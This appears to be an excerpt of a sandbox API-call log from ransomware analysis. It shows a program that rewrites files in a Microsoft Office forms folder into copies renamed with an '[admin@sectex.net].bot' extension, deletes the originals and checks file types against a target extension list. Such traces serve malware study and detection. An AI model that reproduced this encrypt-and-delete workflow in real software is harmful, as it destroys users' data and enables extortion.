	[0164.267] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0164.267] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.268] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0164.268] SetEndOfFile (hFile=0x398) returned 1
	[0164.268] CloseHandle (hObject=0x398) returned 1
	[0164.268] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.268] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.270] CloseHandle (hObject=0x3d0) returned 1
	[0164.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.270] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico")) returned 1
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString=".doc") returned 4
	[0164.271] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.271] lstrlenW (lpString=".docx") returned 5
	[0164.271] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.271] lstrlenW (lpString=".pdf") returned 4
	[0164.271] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.271] lstrlenW (lpString=".xls") returned 4
	[0164.271] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.271] lstrlenW (lpString=".xlsx") returned 5
	[0164.271] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.271] lstrlenW (lpString=".ppt") returned 4
	[0164.271] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString=".zip") returned 4
	[0164.271] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.271] lstrlenW (lpString=".rar") returned 4
	[0164.271] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.271] lstrlenW (lpString=".bz2") returned 4
	[0164.271] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.271] lstrlenW (lpString=".7z") returned 3
	[0164.271] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString=".dbf") returned 4
	[0164.271] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString=".1cd") returned 4
	[0164.271] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.271] lstrlenW (lpString=".jpg") returned 4
	[0164.271] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString=".doc") returned 4
	[0164.272] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.272] lstrlenW (lpString=".docx") returned 5
	[0164.272] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0164.272] lstrlenW (lpString=".pdf") returned 4
	[0164.272] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString=".xls") returned 4
	[0164.272] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString=".xlsx") returned 5
	[0164.272] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0164.272] lstrlenW (lpString=".ppt") returned 4
	[0164.272] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString=".zip") returned 4
	[0164.272] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString=".rar") returned 4
	[0164.272] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.272] lstrlenW (lpString=".bz2") returned 4
	[0164.272] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.272] lstrlenW (lpString=".7z") returned 3
	[0164.272] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString=".dbf") returned 4
	[0164.272] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString=".1cd") returned 4
	[0164.272] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO") returned 65
	[0164.272] lstrlenW (lpString=".jpg") returned 4
	[0164.272] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.273] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.273] lstrlenW (lpString="SECURE.CFG") returned 10
	[0164.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.273] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=647) returned 1
	[0164.273] CloseHandle (hObject=0x3d0) returned 1
	[0164.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg")) returned 0x20
	[0164.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.274] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.274] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.280] GetLastError () returned 0x0
	[0164.280] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x287, lpOverlapped=0x0) returned 1
	[0164.281] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x290, lpOverlapped=0x0) returned 1
	[0164.282] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.282] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.282] SetEndOfFile (hFile=0x398) returned 1
	[0164.282] CloseHandle (hObject=0x398) returned 1
	[0164.282] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.282] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.284] CloseHandle (hObject=0x3d0) returned 1
	[0164.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg")) returned 1
	[0164.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.285] lstrlenW (lpString=".doc") returned 4
	[0164.285] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.285] lstrlenW (lpString=".docx") returned 5
	[0164.285] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0164.285] lstrlenW (lpString=".pdf") returned 4
	[0164.285] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".xls") returned 4
	[0164.286] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".xlsx") returned 5
	[0164.286] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0164.286] lstrlenW (lpString=".ppt") returned 4
	[0164.286] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString=".zip") returned 4
	[0164.286] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".rar") returned 4
	[0164.286] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".bz2") returned 4
	[0164.286] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.286] lstrlenW (lpString=".7z") returned 3
	[0164.286] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString=".dbf") returned 4
	[0164.286] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString=".1cd") returned 4
	[0164.286] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString=".jpg") returned 4
	[0164.286] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.286] lstrlenW (lpString=".doc") returned 4
	[0164.286] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".docx") returned 5
	[0164.286] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0164.286] lstrlenW (lpString=".pdf") returned 4
	[0164.286] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".xls") returned 4
	[0164.286] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.286] lstrlenW (lpString=".xlsx") returned 5
	[0164.287] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0164.287] lstrlenW (lpString=".ppt") returned 4
	[0164.287] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.287] lstrlenW (lpString=".zip") returned 4
	[0164.287] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.287] lstrlenW (lpString=".rar") returned 4
	[0164.287] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.287] lstrlenW (lpString=".bz2") returned 4
	[0164.287] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.287] lstrlenW (lpString=".7z") returned 3
	[0164.287] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.287] lstrlenW (lpString=".dbf") returned 4
	[0164.287] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.287] lstrlenW (lpString=".1cd") returned 4
	[0164.287] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG") returned 64
	[0164.287] lstrlenW (lpString=".jpg") returned 4
	[0164.287] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.287] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.287] lstrlenW (lpString="SECURL.ICO") returned 10
	[0164.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.288] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0164.288] CloseHandle (hObject=0x3d0) returned 1
	[0164.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico")) returned 0x20
	[0164.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.289] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.289] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.290] GetLastError () returned 0x0
	[0164.290] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0164.291] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0164.292] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.292] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.292] SetEndOfFile (hFile=0x398) returned 1
	[0164.293] CloseHandle (hObject=0x398) returned 1
	[0164.293] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.293] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.295] CloseHandle (hObject=0x3d0) returned 1
	[0164.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico")) returned 1
	[0164.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".doc") returned 4
	[0164.296] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.296] lstrlenW (lpString=".docx") returned 5
	[0164.296] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.296] lstrlenW (lpString=".pdf") returned 4
	[0164.296] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString=".xls") returned 4
	[0164.296] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString=".xlsx") returned 5
	[0164.296] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.296] lstrlenW (lpString=".ppt") returned 4
	[0164.296] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".zip") returned 4
	[0164.296] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString=".rar") returned 4
	[0164.296] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString=".bz2") returned 4
	[0164.296] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.296] lstrlenW (lpString=".7z") returned 3
	[0164.296] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".dbf") returned 4
	[0164.296] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".1cd") returned 4
	[0164.296] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".jpg") returned 4
	[0164.296] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.296] lstrlenW (lpString=".doc") returned 4
	[0164.296] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.296] lstrlenW (lpString=".docx") returned 5
	[0164.296] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.297] lstrlenW (lpString=".pdf") returned 4
	[0164.297] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.297] lstrlenW (lpString=".xls") returned 4
	[0164.297] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.297] lstrlenW (lpString=".xlsx") returned 5
	[0164.297] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.297] lstrlenW (lpString=".ppt") returned 4
	[0164.297] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.297] lstrlenW (lpString=".zip") returned 4
	[0164.297] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.297] lstrlenW (lpString=".rar") returned 4
	[0164.297] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.297] lstrlenW (lpString=".bz2") returned 4
	[0164.297] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.297] lstrlenW (lpString=".7z") returned 3
	[0164.297] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.297] lstrlenW (lpString=".dbf") returned 4
	[0164.297] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.297] lstrlenW (lpString=".1cd") returned 4
	[0164.297] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO") returned 64
	[0164.297] lstrlenW (lpString=".jpg") returned 4
	[0164.297] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.297] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.297] lstrlenW (lpString="SECURS.ICO") returned 10
	[0164.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.298] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0164.298] CloseHandle (hObject=0x3d0) returned 1
	[0164.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico")) returned 0x20
	[0164.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.298] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.299] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0164.299] GetLastError () returned 0x0
	[0164.299] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0164.301] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
